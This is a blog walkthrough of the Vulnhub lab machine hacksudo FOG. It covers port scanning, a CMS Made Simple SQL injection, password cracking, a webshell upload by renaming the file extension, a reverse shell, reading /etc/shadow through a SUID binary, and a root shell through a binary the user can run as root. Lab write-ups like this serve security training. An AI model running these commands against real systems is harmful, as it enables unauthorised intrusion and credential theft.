Hacksudo FOG Walkthrough – Writeup – Vulnhub

In this post, I am going to do the walkthrough of the machine hacksudo FOG from Vulnhub by Vishal Waghmare.

Machine Link: https://www.vulnhub.com/entry/hacksudo-fog,697/

Initial Enumeration

I began with netdiscover and then nmap.

sudo netdiscover -i eth0 -r
nmap -v -T4 -p- -sC -sV --min-rate=1000

So, I we have telnet, ssh, http, https and mysql services open. I would like to see what the website offers.

We have a piece of information that suggests some secret message might be hidden in an audio file. So, I will download the video file shown in the source, for enumeration later. Also, the comment says caesar cipher. Hence, I believe there is some text which is encoded by this technique. Meanwhile, I will do gobuster to enumerate files.

gobuster dir -u -x html,txt,php --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

The initial enumeration shows there is a dict.txt and a /cms path and I will visit both of the paths.

There is a dictionary list and a CMSMadeSimple CMS website. After some time I also found another path in the enumeration called /fog. Then, I opened the path but it’s empty.

Subsequently, I looked into the exploitdb for the cms and there is an unauthenticated SQL injection for versions <2.2.10. Likewise, to identify the version of the cms, I am going to use whatweb.



The version is 2.2.5 and it too suffers from unauthenticated SQL injection. https://www.exploit-db.com/exploits/46635. However, the code is in python2 format. So, I have changed it to python3.


python3 46635.py -u

Although the exploit says unauthenticated, I think it’s not the case. And, the only thing that I found useful was the username which I could use to crack passwords in different services. Previously, we had found a dict.txt file that contained the candidates for password.



I downloaded all the files to my local machine and tried opening all. Unfortunately, the zip file is password protected. On the other hand, the zip contains a wav file which might contain the secret information.

Now, I will crack the password using john the ripper.

zip2john secr3tSteg.zip | tee hash
john hash --wordlist=/home/kali/rockyou.txt  
unzip secr3tSteg.zip                                                                                                                                            

After this, I will clone the github repo and try running the binary.

git clone https://github.com/hacksudo/SoundStegno.git
cd SoundStegno
python3 ExWave.py -f ../hacksudoSTEGNO.wav

I found a caesar cipher which I could decode from a website.

Caesar Cipher - Shift by 3
wwww.localhost/fog Username=fog:password=hacksudoISRO

Finally, we got the credentials for CMS.

On an upload directory, we found a rcefile.txt whose mime-type is X-PHP. The code contains a command from which we could inject bash commands using the get parameter cmd. Hence, I am going to change the extension of the file.

I copied the file using the copy feature of the file manager. From now, I can execute remote commands from the get parameter. e.g. -al

The source file includes proper formatting.

So, we can now upload our webshell and execute it. However, it looks like the uploading of php extension isn’t allowed. Therefore, I have to change the extension to txt to allow upload. After upload, I could simply change the extension to PHP as we saw in the previous example.

Finally, I got the reverse shell and did some extra work for getting good pty shell.

stty columns 173 rows 43
cd /var/www
ls -al
cat flag2.txt

Identify users

cat /etc/passwd | grep bash

Identify suid binaries

cd /tmp
wget https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py --no-check-certificate && chmod 777 suid3num.py

I decided to read the shadow file.

/usr/bin/look '' "$LFILE"

I copied the hash of the user isro to a new file in local machine and ran john the ripper.

john hash --wordlist=/home/kali/rockyou.txt

I switched to the user isro and got the flag.

su isro
ls -al
cat user.txt

sudo -l reveals that the user can execute ls command as root user. I looked up in the internet and I didn’t see any way to escalate privilege using ls.

However, there is a directory fog which contains an binary with the same name. We can look up it’s content by using strings command.

cd fog
file fog
strings fog

It looks like we the application is run as root user.

Now, by using the following command, we can switch to root.

os.system("/bin/bash -i")

Now, we capture the root flag.

cd /root
cat root.txt
0 0 votes
Article Rating
Notify of
Inline Feedbacks
View all comments